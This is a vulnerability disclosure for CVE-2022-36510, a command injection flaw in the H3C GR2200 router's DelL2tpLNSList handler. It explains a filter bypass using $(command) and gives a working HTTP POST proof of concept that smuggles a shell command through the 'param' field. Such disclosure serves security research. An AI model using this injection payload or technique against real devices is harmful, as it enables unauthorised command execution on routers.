CVE-2022-36510: vuln/H3C/GR2200/1 at main · Darry-lang1/vuln

H3C GR2200 MiniGR1A0V100R014 Has an command injection vulnerability****Overview

• Manufacturer’s website information：https://www.h3c.com/
• Firmware download address ： https://www.h3c.com/cn/d_202202/1542099_30005_0.htm

Product Information

H3C GR2200 MiniGR1A0V100R014 router, the latest version of simulation overview：

Vulnerability details

H3C GR2200 (MiniGR1A0V100R014) was found to contain a command insertion vulnerability in DelL2tpLNSList.This vulnerability allows an attacker to execute arbitrary commands through the “param” parameter.

Format the param parameter we entered into V13 through the snprintf function, and execute our command through the system function. Because V8 and V9 are limited to 8 bytes, we can fill V8 with 8 bytes so that when %s in the snprintf function is formatted, V8 and V9 will be connected actively.

Although the sub_46EE30 function filters some dangerous characters, we can bypass them with $(command).

Recurring vulnerabilities and POC

In order to reproduce the vulnerability, the following steps can be followed:

1. Boot the firmware by qemu-system or other ways (real machine)

2. Attack with the following POC attacks

   POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.124.1:80/maintain_basic.asp Cookie: JSESSIONID=04f803a0 Upgrade-Insecure-Requests: 1 Content-Length: 67

   CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1;$(ps>/ww w/1) #;

The picture above shows the debug log after POC is sent.

The above illustration shows the effect of command execution.